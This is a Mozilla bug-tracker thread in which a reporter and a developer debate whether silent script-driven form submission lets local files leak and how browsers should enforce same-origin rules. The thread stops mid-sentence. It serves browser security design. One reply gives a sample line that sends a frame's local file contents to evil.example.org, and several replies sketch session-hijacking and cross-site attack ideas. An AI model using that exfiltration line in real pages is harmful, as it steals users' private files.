Closed Bug 258866 Opened 20 years ago Closed 20 years ago

Javascript allows malicious file to silently upload arbitrary text / xml files via forms

Categories

(Core :: DOM: Core & HTML, defect)

defect
Not set
normal

Tracking

()

RESOLVED INVALID

People

(Reporter: bmills, Unassigned)

Details

Attachments

(2 files)

User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3

See forthcoming proof-of-concept source file

Reproducible: Always
Steps to Reproduce:
View exploit page.  The iframe's contents can be an arbitrary file:// URL.  The
mode of deployment would probably be as an email attachment (opening the
document could, for example, trigger transmission of an address book file back
to a trojan-infected machine).



It seems to me that allowing non-interactive submission of form data is a
really, really bad way to go, security-wise.

The current hack of "don't allow pages to load certain files or access contents
of certain documents" can't possibly cover all the edges, and even if it does,
throwing that many extra checks in seems like an awful lot of overhead.

Plus, the fact that javascript can arbitrarily submit data at will causes other,
nastier hacks, like disabling remote XSLT -- a real pain for anyone trying to
use MathML.

The ability for forms to submit themselves will prevent Mozilla from ever
implementing external entities in DTDs (or at least from doing so safely), 
because an entity declaration in a DTD can provide a script with the contents of
an arbitrary file.  Entity declarations are extremely useful, and external
entity declarations are necessary for modular XML -- so it would seem imprudent
to make it safe to add that capability to future versions of Mozilla.

I suggest implementing form-submission-protection in the same manner as
popup-blocking -- allow a whitelist, if need be, and show the "blocked" icon,
and allow actions as a result of user input, but for god's sake don't let pages
submit information without the user's knowledge!

(As an aside, it may be possible to use form auto-fill and auto-submission to
gather email addresses and/or credit card numbers -- yet another reason why an
unprotected submit function is a very bad idea, W3 or not.  I haven't
investigated this possibility.)
Attached file xhtml proof-of-concept
Only an exploit if opened locally, but nonetheless an exploit.
No browsers currently support external entities, but you don't really want to
force the XML-parsing folks to have to check origins of DTDs if they do
implement, do you?
Yes, we do, don't we?


I don't understand the exploit here:

> View exploit page.  The iframe's contents can be an arbitrary file:// URL. 

Only if the page itself is in the file:// world, which it won't be for any 
remote content. The user would have to explicitly save the file then open it, at 
which point it has the same security model as any local file.


> The mode of deployment would probably be as an email attachment (opening the
> document could, for example, trigger transmission of an address book file back
> to a trojan-infected machine).

E-mails are not given file:// URIs unless specifically saved to disk.


> It seems to me that allowing non-interactive submission of form data is a
> really, really bad way to go, security-wise.

It's used all over the place. It is also not the only way for scripts to cause 
data to be sent to a remote server -- you could do the same using location.href, 
using synthesised clicks on a link, using a meta refresh, using a dynamically 
created iframe, changing the src of an img, object or iframe, linking to a 
stylesheet, creating a stylesheet that uses a url() dynamically, etc etc etc.


> The current hack of "don't allow pages to load certain files or access
> contents of certain documents" can't possibly cover all the edges

Why not? Why is it a hack?


> and even if it does, throwing that many extra checks in seems like an awful 
> lot of overhead.

It's just one or two places, that are then reused whenever relevant.


> Plus, the fact that javascript can arbitrarily submit data at will causes 
> other, nastier hacks, like disabling remote XSLT -- a real pain for anyone 
> trying to use MathML.

Could you explain this case?


> The ability for forms to submit themselves will prevent Mozilla from ever
> implementing external entities in DTDs (or at least from doing so safely), 
> because an entity declaration in a DTD can provide a script with the contents 
> of an arbitrary file.

You can already do this using <script src=""> -- not a problem, since the same-
origin or restricted-scheme checks are done there already.


> Entity declarations are extremely useful, and external entity declarations are 
> necessary for modular XML -- so it would seem imprudent to make it safe to add 
> that capability to future versions of Mozilla.

Personally I would recommend against going that route. XInclude, XBL, and 
similar schemes fit better into the XML world IMHO. Entities are a holdover from 
the SGML world which didn't have namespaces, didn't do incremental rendering 
over slow links, didn't do scripting, etc.
> > The mode of deployment would probably be as an email attachment (opening the
> > document could, for example, trigger transmission of an address book file back
> > to a trojan-infected machine).
> 
> E-mails are not given file:// URIs unless specifically saved to disk.

That mainly depends on the mail client, but in my experience most clients save
attachments to disk and then open from a disk cache, which lies in the file://
world.

> > It seems to me that allowing non-interactive submission of form data is a
> > really, really bad way to go, security-wise.
> 
> It's used all over the place. It is also not the only way for scripts to cause 
> data to be sent to a remote server -- you could do the same using location.href, 
> using synthesised clicks on a link, using a meta refresh, using a dynamically 
> created iframe, changing the src of an img, object or iframe, linking to a 
> stylesheet, creating a stylesheet that uses a url() dynamically, etc etc etc.

Yes, it is the only way for scripts to cause data to be sent to a remote server,
which is why allowing it in response to user actions is perfectly acceptable.  I
don't know about you, but I really don't want my browser sending excess data to
foreign servers without my knowledge or consent.  Besides, if Mozilla is going
to verify on re-post, it may as well verify on silent-post.

> > The current hack of "don't allow pages to load certain files or access
> > contents of certain documents" can't possibly cover all the edges
> 
> Why not? Why is it a hack?

It's a hack because (a) it's not very well documented, so it comes as a surprise
to people who are authoring unusual HTML/XML documents who expect things in the
spec to work as the spec says, and because (b) it's covering a lot of peripheral
cases instead of the actual source of the problem, meaning that this approach is
prone to lots of little holes.

> > and even if it does, throwing that many extra checks in seems like an awful 
> > lot of overhead.
> 
> It's just one or two places, that are then reused whenever relevant.

"Whenever relevant" being during loading of frames, XSL documents, and DTDs? 
There's a principle of software design that says that if you don't use a
feature, you shouldn't have to pay any overhead for it -- in this case, HTML and
XML rendering both pay all the time for the fact that scripts have a
less-than-optimal security model.

> > Plus, the fact that javascript can arbitrarily submit data at will causes 
> > other, nastier hacks, like disabling remote XSLT -- a real pain for anyone 
> > trying to use MathML.
> 
> Could you explain this case?

Mozilla doesn't support XSLT files on servers other than the one hosting the
initial document.  It also doesn't support content MathML.  There's a convenient
presentation MathML-to-content MathML XSL document on w3.org, BUT that means
that with every MathML document I transmit I'm forced to include 5 additional
files to make it readable.  This is all because there's a very outside chance
that someone might be able to use XSLT and scripting to transmit local XML files.

> > The ability for forms to submit themselves will prevent Mozilla from ever
> > implementing external entities in DTDs (or at least from doing so safely), 
> > because an entity declaration in a DTD can provide a script with the contents 
> > of an arbitrary file.
> 
> You can already do this using <script src=""> -- not a problem, since the same-
> origin or restricted-scheme checks are done there already.

Do the same-origin and restricted-scheme checks apply to DTD elements?  I was
under the impression that external elements hadn't even been implemented yet.

> > Entity declarations are extremely useful, and external entity declarations are 
> > necessary for modular XML -- so it would seem imprudent to make it safe to add 
> > that capability to future versions of Mozilla.
> 
> Personally I would recommend against going that route. XInclude, XBL, and 
> similar schemes fit better into the XML world IMHO. Entities are a holdover from 
> the SGML world which didn't have namespaces, didn't do incremental rendering 
> over slow links, didn't do scripting, etc.

Regardless of the presence of better alternatives, there are some XML
applications (modular XHTML 1.1, for one!) that make heavy use of external
element declarations.  Ignoring major normative document-types just because you
don't want to fix scripting security doesn't seem like a very forward-looking
approach.
> > 
> > E-mails are not given file:// URIs unless specifically saved to disk.
> 
> That mainly depends on the mail client, but in my experience most clients save
> attachments to disk and then open from a disk cache, which lies in the file://
> world.

Granted, if you use a non-Mozilla mail client, it is possible that the page 
would later be opened in Mozilla using the file:// scheme. Does that mean we 
want to prevent file:// documents from accessing the network? Is there anything 
else file:// pages can do that http:// pages can't?


> > It is also not the only way for scripts to cause data to be sent to a
> > remote server -- you could do the same using location.href, [...]
> 
> Yes, it is the only way for scripts to cause data to be sent to a remote
> server

No, it isn't, that's my point.

Using your example, you could, e.g., change it to do:

   location.href = 'http://evil.example.org/?'
                      + escape(secretElt.contentDocument.body.innerHTML);

The same applies for dozens of other methods that result in the server being 
contacted with author-defined data.


> > > The current hack of "don't allow pages to load certain files or access
> > > contents of certain documents" can't possibly cover all the edges
> > 
> > Why not? Why is it a hack?
> 
> It's a hack because (a) it's not very well documented, so it comes as a
> surprise to people who are authoring unusual HTML/XML documents who expect 
> things in the spec to work as the spec says

The spec is broken, WHATWG should probably address this. (www.whatwg.org)


> and because (b) it's covering a lot of peripheral cases instead of the actual 
> source of the problem, meaning that this approach is prone to lots of little 
> holes.

The source of the problem is that http:// pages can access file:// pages, not 
that they can send arbitrary data to servers. Sending data happens all the time 
in Web pages. Thus, it is the hole that is filled.


> "Whenever relevant" being during loading of frames, XSL documents, and DTDs? 

And so forth, yes. Stylesheets, following links, backgrounds, etc.


> There's a principle of software design that says that if you don't use a
> feature, you shouldn't have to pay any overhead for it -- in this case, HTML
> and XML rendering both pay all the time for the fact that scripts have a
> less-than-optimal security model.

My understanding is that the "cost" is an insignificant part of page loading, 
but the only way to really look at this is using profiling tools.


> Mozilla doesn't support XSLT files on servers other than the one hosting the
> initial document.

Yes, this is a (quite important) security issue. If it allowed this, you could 
recreate various cross-domain cookie leaking bugs, etc.


> > You can already do this using <script src=""> -- not a problem, since the 
> > same-origin or restricted-scheme checks are done there already.
> 
> Do the same-origin and restricted-scheme checks apply to DTD elements?  I was
> under the impression that external elements hadn't even been implemented yet.

They haven't, but if they were, they probably would. It is unlikely that they 
will any time soon though.


> Regardless of the presence of better alternatives, there are some XML
> applications (modular XHTML 1.1, for one!) that make heavy use of external
> element declarations.

You don't need to parse the DTD at all to make use of "modular XHTML 1.1". (The 
namespace is all you need to process such files.)


> Ignoring major normative document-types just because you don't want to fix 
> scripting security doesn't seem like a very forward-looking approach.

Unfortunately the alternative -- prompting the user every time script contacts 
an external host -- would get very annoying very quickly, with the result that 
users would just ignore the prompts, or allow any site to do anything, or, 
worse, use another browser.

The file:// restriction mechanism is well-understood and implemented in all 
browsers, doesn't interfere with regular Web pages' operations, and doesn't 
prompt the user. I don't understand why it is a problem, except for the case 
where local file://s can contact remote hosts, which might indeed need to be 
addressed.
Would someone mind restating the bug for me? Sounds like initially it was "don't
let js submit forms", but that's a WONTFIX -- too much of the real-world web
relies on that and if we blocked it people would simply switch to a "non-broken"
browser rather than thank us for making them more secure.

As hixie points out, it's not form submission that's the issue, it scripting.
Turning off scripting is even more of a non-starter for an end-user browser,
though for people willing to live with the inconveniences it mostly works.
The problem isn't the fact that javascript can submit forms -- the problem is
that it can do so (a) silently, and (b) without any interaction from the user.

I'm suggesting a javascript-transmission-blocker based on the same algorithm as
the javascript-popup-blocker already in the system -- let trusted sites do it
all the time, let user-actions trigger it, and make it easy to tell when it happens.

The number of real-world sites that use Javascript for form submission is quite
high; however, the number of legitimate real-world sites that use Javascript to
submit forms silently without any user interaction is extraordinarily small.

I'm not suggesting turning scripting off -- that's obviously not feasible.  I'm
just suggesting doing scripting security in the scripting engine rather than
pushing it off on every other browser component.
(In reply to comment #5)
> > and because (b) it's covering a lot of peripheral cases instead of the actual 
> > source of the problem, meaning that this approach is prone to lots of little 
> > holes.
> 
> The source of the problem is that http:// pages can access file:// pages, not 
> that they can send arbitrary data to servers. Sending data happens all the time 
> in Web pages. Thus, it is the hole that is filled.

Yes, and it would be perfectly reasonable, IMO, to prevent http:// pages from
accessing file:// pages (*with* the option to explicitly allow when blocked!);
but there's also this additional nonsense where file:// pages can't access
http:// pages, and http:// pages can't access other http:// pages -- far less
clear-cut than you make it sound. 
 
> > "Whenever relevant" being during loading of frames, XSL documents, and DTDs? 
> 
> And so forth, yes. Stylesheets, following links, backgrounds, etc.

That's an awful lot of cases to cover, with no guarantee that you're not
forgetting one.  It would be much safer to stop the problem at the source.

> > There's a principle of software design that says that if you don't use a
> > feature, you shouldn't have to pay any overhead for it -- in this case, HTML
> > and XML rendering both pay all the time for the fact that scripts have a
> > less-than-optimal security model.
> 
> My understanding is that the "cost" is an insignificant part of page loading, 
> but the only way to really look at this is using profiling tools.

I'm not talking about cost in terms of CPU load.  I'm talking about cost in
terms of unnecessary restrictions, additional cases to check, and 5x as many
documents having to be passed around to render the same document.  Cost in
real-world frustrations for users like me who don't want to have to tarball
their markup with five readily-available stylesheets just to make it render the
way it's specified. 

> > Mozilla doesn't support XSLT files on servers other than the one hosting the
> > initial document.
> 
> Yes, this is a (quite important) security issue. If it allowed this, you could 
> recreate various cross-domain cookie leaking bugs, etc.

It's interesting that you should say that, because I've read both of the public
bugs that address cross-domain XSLT, and not once was cookie-spoofing mentioned.
 I've searched for quite some time for any and all instances of XSL exploits of
any sort, and have yet to see so much as a proof-of-concept.  All I've seen
mentioned anywhere is "IE does it, so we should, too" -- and as far as I'm
concerned, the behavior of IE WRT to security and functionality isn't a very
good goal.

> > Regardless of the presence of better alternatives, there are some XML
> > applications (modular XHTML 1.1, for one!) that make heavy use of external
> > element declarations.
> 
> You don't need to parse the DTD at all to make use of "modular XHTML 1.1". (The 
> namespace is all you need to process such files.)

But you do need to parse the DTD to get the right entity references, and there
are a lot of cases where entity references are specified in old SGML documents
that really need DTD entities.

> > Ignoring major normative document-types just because you don't want to fix 
> > scripting security doesn't seem like a very forward-looking approach.
> 
> Unfortunately the alternative -- prompting the user every time script contacts 
> an external host -- would get very annoying very quickly, with the result that 
> users would just ignore the prompts, or allow any site to do anything, or, 
> worse, use another browser.

I don't think that is in the alternative.  I think the alternative is prompting
the user every time an untrusted script contacts an external host *without being
told to*.  The number of legitimate cases that would satisfy those conditions is
extremely small.

> The file:// restriction mechanism is well-understood and implemented in all 
> browsers, doesn't interfere with regular Web pages' operations, and doesn't 
> prompt the user. I don't understand why it is a problem, except for the case 
> where local file://s can contact remote hosts, which might indeed need to be 
> addressed.

The file:// restriction mechanism causes serious issues, especially for people
like me who are trying to use non-HTML XML markup -- which is going to be far
more common in the future.  Not to mention, it creates the potential for massive
security holes as soon as someone forgets to add a check in some new module that
doesn't have a thing to do with scripting.
> 
> Yes, and it would be perfectly reasonable, IMO, to prevent http:// pages from
> accessing file:// pages (*with* the option to explicitly allow when blocked!);
> but there's also this additional nonsense where file:// pages can't access
> http:// pages, and http:// pages can't access other http:// pages -- far less
> clear-cut than you make it sound. 

All of these restrictions are for specific reasons (such as remote sites not 
contacting unprotected intranet sites, remote sites not cookie-stealing from 
other remote sites, remote sites not using the UA to send messages to SMTP 
ports, etc, etc, etc).


> That's an awful lot of cases to cover, with no guarantee that you're not
> forgetting one.  It would be much safer to stop the problem at the source.

We disagree on what "the source" is. But if you mean that it would be better to 
stop scripts from automatically contacting other sites by prompting the user 
when a script does so, rather than stop scripts from contacting other sites by 
simply blocking it when it tries to do a dangerous access, then I don't 
understand why it would be safer. You have to put the checks in all the same 
places, except now instead of just blocking the dangerous cases, you rely on the 
user knowing which are dangerous, and on the user not making any mistakes.

Which is more likely: one of a few hundred professional Web Browser engineers 
making a mistake, or one of a few hundred million newbies making a mistake?


> I'm not talking about cost in terms of CPU load.  I'm talking about cost in
> terms of unnecessary restrictions

They're not unnecessary, IMHO. Which case would you say should be allowed but 
isn't?


> additional cases to check

No, you'd have to check the same number of places.


> and 5x as many documents having to be passed around to render the same
> document.

Instead of prompting the user for 5 times as many documents, causing the user to 
become apathetic to the issue and allow hostile code to run.


>> Yes, this is a (quite important) security issue. If it allowed this, you 
>> could recreate various cross-domain cookie leaking bugs, etc.
> 
> It's interesting that you should say that, because I've read both of the 
> public bugs that address cross-domain XSLT, and not once was cookie-spoofing 
> mentioned.

Cookie-spoofing and intranet-snopping are the reasons why cross-domain accesses 
are blocked.


> I've searched for quite some time for any and all instances of XSL exploits of
> any sort, and have yet to see so much as a proof-of-concept.

That would be because it's blocked, and so not possible.


>> You don't need to parse the DTD at all to make use of "modular XHTML 1.1". 
>> (The namespace is all you need to process such files.)
> 
> But you do need to parse the DTD to get the right entity references, and there
> are a lot of cases where entity references are specified in old SGML documents
> that really need DTD entities.

SGML isn't supported by UAs. XML UAs aren't required to read DTDs. When authors 
send markup over the wire, they should do so using only widely standardised 
markup languages (MathML, XHTML, SVG for graphics).

So, when you convert your SGML files to XHTML+MathML+SVG, simply substitute the 
entities in at the same time.


> I think the alternative is prompting the user every time an untrusted script 
> contacts an external host *without being told to*.  The number of legitimate 
> cases that would satisfy those conditions is extremely small.

Wrong. The number of cases that this would satisfy is very high indeed.

For example, any site that does:

   onclick="location.href=..."

All the sites that use <select> elements for navigation.

All the sites that use location.href="" for redirects.

All the JavaScript games and applications that communicate with the remote 
server (e.g. GMail, www.voidwars.com, etc).

Any page with a form that targets an IFrame.

Any page with a form that targets a non-HTTP port.

All your MathML pages when they switch to using remote XSLT.

EVERY single one of these would prompt the user. I know _I_ would get annoyed 
very quickly; I can only imagine how annoying it would be for users and how 
quickly they would become desensitised to it.


> The file:// restriction mechanism causes serious issues, especially for people
> like me who are trying to use non-HTML XML markup -- which is going to be far
> more common in the future.

The only issue I'm aware of is the XSLT cross-site issue, and that's trivially 
worked around by simply copying the files onto the new host (which is a good 
thing anyway since otherwise the original host could get overwhelmed). How is 
the file:// restriction causing you serious issues?

(If the Content MathML stylesheet is good, by the way, you might want to look 
into whether Mozilla might want to port it to C++ and effectively use it 
internally to implement Content MathML.)


> Not to mention, it creates the potential for massive security holes as soon as 
> someone forgets to add a check in some new module that doesn't have a thing to 
> do with scripting.

The same checks would be required in your model.
(In reply to comment #9)
> > I'm not talking about cost in terms of CPU load.  I'm talking about cost in
> > terms of unnecessary restrictions
> 
> They're not unnecessary, IMHO. Which case would you say should be allowed but 
> isn't?

I'm not saying that security checks aren't necessary.  I'm saying that they'd be
better done on the script side instead of the document side.

> > and 5x as many documents having to be passed around to render the same
> > document.
> 
> Instead of prompting the user for 5 times as many documents, causing the user to 
> become apathetic to the issue and allow hostile code to run.

Not necessarily.  Most users are never prompted by the popup-blocking system,
which appears to use a very similar algorithm to what I'm proposing.

I'm *not* saying that the user should be prompted every time a script transmits
data.  I *am* saying that a user should be prompted every time an untrusted
script transmits data when it isn't responding to a UI event.  I'm just talking
about things like onload events and non-function-declarations in script tags --
the sort of thing that results from a cross-site-scripting attack from the
server side.

> >> Yes, this is a (quite important) security issue. If it allowed this, you 
> >> could recreate various cross-domain cookie leaking bugs, etc.
> > 
> > It's interesting that you should say that, because I've read both of the 
> > public bugs that address cross-domain XSLT, and not once was cookie-spoofing 
> > mentioned.
> 
> Cookie-spoofing and intranet-snopping are the reasons why cross-domain accesses 
> are blocked.

Yes, but cross-domain accesses don't block the results of server-end cross-site
scripting attacks, so users are still just as vulnerable.  The problem isn't
solved, it's just moved to a codebase we have no control over, and personally I
think moving a problem to where you can't fix it is not an acceptable solution.

> > I've searched for quite some time for any and all instances of XSL exploits of
> > any sort, and have yet to see so much as a proof-of-concept.
> 
> That would be because it's blocked, and so not possible.

No, I mean I have yet to see any document stating the reason for it being
blocked in any terms other than "Microsoft does it".  Nowhere have I seen any
documents detailing how XSL could be used for any sort of client-side exploit,
even in theoretical terms.

> Wrong. The number of cases that this would satisfy is very high indeed.
> 
> For example, any site that does:
> 
>    onclick="location.href=..."

That's in response to a UI event, so it wouldn't be blocked.

> All the sites that use <select> elements for navigation.

I consider onchange to be a UI event also.  Not blocked in this case.

> All the sites that use location.href="" for redirects.

Should absolutely not be doing that anyway.  It breaks "back" button support. 
Even so, I think in that case prompting the user wouldn't be that annoying --
most sites that use HTML redirects use meta tags anyway.

> All the JavaScript games and applications that communicate with the remote 
> server (e.g. GMail, www.voidwars.com, etc).

Whitelisting?  Also, JavaScript games and applications generally communicate in
response to UI events.

> Any page with a form that targets an IFrame.

You'll have to explain this case to me.  I don't know what bearing it has on
execution of autonomous scripts.

> Any page with a form that targets a non-HTTP port.

Again, I don't see the connection.

> All your MathML pages when they switch to using remote XSLT.

I'm still not convinced that remote XSLT has any potential for vulnerabilities.
 If you could provide a link to an example or a proof-of-concept or even a
theoretical discussion of a possible attack...

Also, I would whitelist W3C, so it would just be one prompt if any.

> EVERY single one of these would prompt the user. I know _I_ would get annoyed 
> very quickly; I can only imagine how annoying it would be for users and how 
> quickly they would become desensitised to it.

One case would prompt the user, once.  I'd be much less annoyed that way than
having to tarball 5 XSLs with my document.  I'd also be happier that I'd be
protected against cross-site attacks.  I don't know about you, but theft by
fraud is pretty annoying to me.
 
> > The file:// restriction mechanism causes serious issues, especially for people
> > like me who are trying to use non-HTML XML markup -- which is going to be far
> > more common in the future.
> 
> The only issue I'm aware of is the XSLT cross-site issue, and that's trivially 
> worked around by simply copying the files onto the new host (which is a good 
> thing anyway since otherwise the original host could get overwhelmed).

It's not a trivial workaround when the document doesn't fit your "all HTML is
served on a website" paradigm.  A lot of the document markup I'm doing these
days consists of documents to be sent to colleagues via email, so the added
steps of either printing to PDF or packaging XSL files cause quite a bit of
overhead.

> How is 
> the file:// restriction causing you serious issues?

Because I'm trying not to have a dozen copies of the same stylesheet sitting
around on my drive.  I'd like to be able to at least serve the stylesheets from
localhost, but I can't even do that.

> (If the Content MathML stylesheet is good, by the way, you might want to look 
> into whether Mozilla might want to port it to C++ and effectively use it 
> internally to implement Content MathML.)

I'd say that using XSL to support Content MathML is actually the better plan --
that way any extensions or improvements in newer versions will be supported
automatically as soon as the stylesheet is updated.

> > Not to mention, it creates the potential for massive security holes as soon as 
> > someone forgets to add a check in some new module that doesn't have a thing to 
> > do with scripting.
> 
> The same checks would be required in your model.

Yes, but they'd be required in vastly different places -- and they'd cut down on
the possibility of compromised servers being used for cross-site script
injection attacks.
> ...cross-domain accesses don't block the results of server-end cross-site
> scripting attacks, so users are still just as vulnerable.

A hostile server contacting a third party site cannot harm the user.
A page from a hostile server contacting a third party site from the client, can, 
by stealing bandwidth, using the user's credentials (through use of cookies or 
logged-in HTTP authentication), and contacting hosts that are accessible to the 
user but not the hostile server.

If a hostile server could attack a third-party site in such a way as to harm the 
user, the user wouldn't have to visit the hostile site in the first place, and 
there would not be any user agent security problem to speak of. (And that would 
thus be out of scope for this discussion.)


> No, I mean I have yet to see any document stating the reason for it being
> blocked in any terms other than "Microsoft does it".  Nowhere have I seen any
> documents detailing how XSL could be used for any sort of client-side exploit,
> even in theoretical terms.

It's the same methods as any other system:

1. Cookie exploit: if an XSLT sheet is returned differently based on the user's 
cookie-based credentials, then a hostile site can infer details from the XSLT 
sheet by applying the sheet to carefully-crafted documents.

2. Intranet snooping exploit: if an XSLT sheet is inside an intranet, only 
accessible to the user, a hostile site can effectively reverse engineer the 
stylesheet by leading the user to a page and applying the transformation sheet 
to numerous inputs in sequence and observing the results while the user is 
visiting the hostile page.


> > For example, any site that does:
> > 
> >    onclick="location.href=..."
> 
> That's in response to a UI event, so it wouldn't be blocked.

That would be a security hole. It is trivial to trick users into clicking. For 
example, the hostile page could be a game requiring clicking. Or it could be an 
innocent-looking page with many links, one of which just happens to be hostile.


>> All the sites that use <select> elements for navigation.
> 
> I consider onchange to be a UI event also.  Not blocked in this case.

I would not feel safe using a browser that let any page with select-based 
navigation have full access to my hard drive, local network, and third party 
sites (such as my bank), etc.


> > All the sites that use location.href="" for redirects.
> 
> Should absolutely not be doing that anyway.

That's largely irrelevant, there are millions of sites that do it and we can't 
afford to break them -- if we did, we would lose what little market share we had 
rather quickly.


>> Any page with a form that targets an IFrame.
> 
> You'll have to explain this case to me.  I don't know what bearing it has on
> execution of autonomous scripts.

It is easy to trick users into clicking buttons. If you get a form to target an 
iframe, then you can make that form fetch the content of a third party site
(e.g. a bank) and then have the hostile page walk the DOM of this site to take 
out of it whatever information it might want.


> > Any page with a form that targets a non-HTTP port.
> 
> Again, I don't see the connection.

There have been exploits where (non-scripted, I believe) pages tricked users 
into submitting forms that actually targetted SMTP servers with carefully 
crafted content, such as to cause the servers to send e-mail (spam) on behalf of 
the user.


> Also, I would whitelist W3C, so it would just be one prompt if any.

Whitelisting doesn't work when the whitelisted site is compromised and becomes a 
hostile site (as happened recently with an IIS exploit -- IE users suddenly 
found themselves attacked by what were previously considered trusted sites).


> One case would prompt the user, once.  I'd be much less annoyed that way than
> having to tarball 5 XSLs with my document.

As a user, I would be a lot _less_ annoyed if I had no prompts and you had to 
copy some XSLT files, than if I had a prompt and you could just use W3C 
bandwidth instead of your own.


> I'd also be happier that I'd be protected against cross-site attacks.

I hope I have explained why in fact you would be less protected than in the 
current system (which simply blocks all such attempts rather than only blocking 
those that didn't originate from user clicks).


> > The only issue I'm aware of is the XSLT cross-site issue, and that's 
> > trivially worked around by simply copying the files onto the new host (which 
> > is a good thing anyway since otherwise the original host could get 
> > overwhelmed).
> 
> It's not a trivial workaround when the document doesn't fit your "all HTML is
> served on a website" paradigm.  A lot of the document markup I'm doing these
> days consists of documents to be sent to colleagues via email, so the added
> steps of either printing to PDF or packaging XSL files cause quite a bit of
> overhead.

Personally as a user I hate receiving attachments and would recommend just 
putting the files on a server and e-mailing the URIs.


> > How is the file:// restriction causing you serious issues?
> 
> Because I'm trying not to have a dozen copies of the same stylesheet sitting
> around on my drive.  I'd like to be able to at least serve the stylesheets
> from localhost, but I can't even do that.

I don't understand how any of this related to file:// URIs being non-accessible 
from http:// URIs. Could you expand on exactly what your use case is?


> > (If the Content MathML stylesheet is good, by the way, you might want to 
> > look into whether Mozilla might want to port it to C++ and effectively use 
> > it internally to implement Content MathML.)
> 
> I'd say that using XSL to support Content MathML is actually the better plan
> -- that way any extensions or improvements in newer versions will be supported
> automatically as soon as the stylesheet is updated.

Unfortunately XSLT cannot handle dynamic DOM updates and is therefore not 
appropriate as a long-term solution.


> > The same checks would be required in your model.
> 
> Yes, but they'd be required in vastly different places -- and they'd cut down 
> on the possibility of compromised servers being used for cross-site script
> injection attacks.

Actually unless I really don't understand your proposal, the checks would be 
needed in exactly the same places.
(In reply to comment #11)
I'm not talking about hostile servers attacking a third-party site.  I'm talking
about the well-known procedure of cross-site scripting, by which one server
provides a URL to a second (trusted) server, and the trusted server injects a
script fragment from the URL into the document it produces.  This can be used
for session hijacking, and all it requires is document.cookie and location.href.

> It's the same methods as any other system:
> 
> 1. Cookie exploit: if an XSLT sheet is returned differently based on the user's 
> cookie-based credentials, then a hostile site can infer details from the XSLT 
> sheet by applying the sheet to carefully-crafted documents.

That's not a cookie exploit.  That's an authentication exploit that may or may
not have anything to do with cookies.  However, in order to infer the contents
of an XSLT stylesheet, one would have to produce markup in the domain of the
stylesheet -- meaning that they'd already have to know the structure of the
documents the stylesheet applies to.  And if they already know about the
documents, which are what's going to contain the actual sensitive data, then
what they can infer about the stylesheet, at best, would be some clue as to what
the tags *the attacker already knew about* mean.

Regardless, the same exploit applies to CSS and scripts, but you don't see
anyone getting paranoid about local CSS files being leaked.

> 2. Intranet snooping exploit: if an XSLT sheet is inside an intranet, only 
> accessible to the user, a hostile site can effectively reverse engineer the 
> stylesheet by leading the user to a page and applying the transformation sheet 
> to numerous inputs in sequence and observing the results while the user is 
> visiting the hostile page.

These are stylesheets we're talking about, right?  Sensitive data isn't
something one puts into a stylesheet, it's something one puts into a document. 
Again, in order to reverse-engineer, the attacker would already have to know
about the contents of the documents the stylesheet is designed to operate on.

If I stored sensitive information in a CSS stylesheet, it would be very easily
leaked.  If the same is true for XSL, it's because BOTH ARE STYLESHEETS. 
Neither is designed to store actual information.

Besides, the problem is entirely moot if the hostile site doesn't get anything
back from the client.

> > >    onclick="location.href=..."
> > 
> > That's in response to a UI event, so it wouldn't be blocked.
> 
> That would be a security hole. It is trivial to trick users into clicking. For 
> example, the hostile page could be a game requiring clicking. Or it could be
> an innocent-looking page with many links, one of which just happens to be 
> hostile.
>
> >> All the sites that use <select> elements for navigation.
> > 
> > I consider onchange to be a UI event also.  Not blocked in this case.
> 
> I would not feel safe using a browser that let any page with select-based 
> navigation have full access to my hard drive, local network, and third party 
> sites (such as my bank), etc.
>

So the conclusion we're drawing here is that pages shouldn't be able to examine
the contents of other pages.  There's a reason innerHTML isn't in the W3 DOM.

The thing is, checking domains doesn't guarantee safety, either.  Suppose you're
a low-level employee of a major corporation.  You set up an exploit in your
user-space on the corporate website, and send the link to your supervisor;
suddenly, you have access to all of your co-workers' employment records and your
company's trade secrets.  And checking page origin doesn't stop that at all.

> >> Any page with a form that targets an IFrame.
> > 
> > You'll have to explain this case to me.  I don't know what bearing it has on
> > execution of autonomous scripts.
> 
> It is easy to trick users into clicking buttons. If you get a form to target an 
> iframe, then you can make that form fetch the content of a third party site
> (e.g. a bank) and then have the hostile page walk the DOM of this site to take 
> out of it whatever information it might want.

DOM-walking via iframes requires the use of innerHTML, an inherently unsafe
property.  Again, you could do the same with any site for which you can access
the domain.  What's to stop the bank's janitor from stealing credit card
information?  There's just no way to make it safe without verifying.

> > > Any page with a form that targets a non-HTTP port.
> > 
> > Again, I don't see the connection.
> 
> There have been exploits where (non-scripted, I believe) pages tricked users 
> into submitting forms that actually targetted SMTP servers with carefully 
> crafted content, such as to cause the servers to send e-mail (spam) on behalf of 
> the user.

And how is this being prevented currently?  I still don't see the relevance.

> > Also, I would whitelist W3C, so it would just be one prompt if any.
> 
> Whitelisting doesn't work when the whitelisted site is compromised and becomes a 
> hostile site (as happened recently with an IIS exploit -- IE users suddenly 
> found themselves attacked by what were previously considered trusted sites).

Yes, and signing into my online banking might reveal my account information if
my bank has been hacked.

> > One case would prompt the user, once.  I'd be much less annoyed that way than
> > having to tarball 5 XSLs with my document.
> 
> As a user, I would be a lot _less_ annoyed if I had no prompts and you had to 
> copy some XSLT files, than if I had a prompt and you could just use W3C 
> bandwidth instead of your own.

It's not about bandwidth -- it's about interoperability.  Blocking cross-domain
documents prevents a central information provider (W3C, Mozilla, Microsoft,
whatever) from being able to provide document formatting information to all
browsers.  What do we get instead?  Companies that adjust their browsers
*internally* to handle proprietary markup and attributes.

> > I'd also be happier that I'd be protected against cross-site attacks.
> 
> I hope I have explained why in fact you would be less protected than in the 
> current system (which simply blocks all such attempts rather than only blocking 
> those that didn't originate from user clicks).

But the current system doesn't block all such attempts.  It doesn't block
cross-site script injection at all, and I think that's a far more severe problem
than inferring the contents of stylesheets.

> > It's not a trivial workaround when the document doesn't fit your "all HTML is
> > served on a website" paradigm.  A lot of the document markup I'm doing these
> > days consists of documents to be sent to colleagues via email, so the added
> > steps of either printing to PDF or packaging XSL files cause quite a bit of
> > overhead.
> 
> Personally as a user I hate receiving attachments and would recommend just 
> putting the files on a server and e-mailing the URIs.

Well, I'd rather not make some of my documents publicly available, and I'd
rather not have to configure an HTTP server with authentication for every person
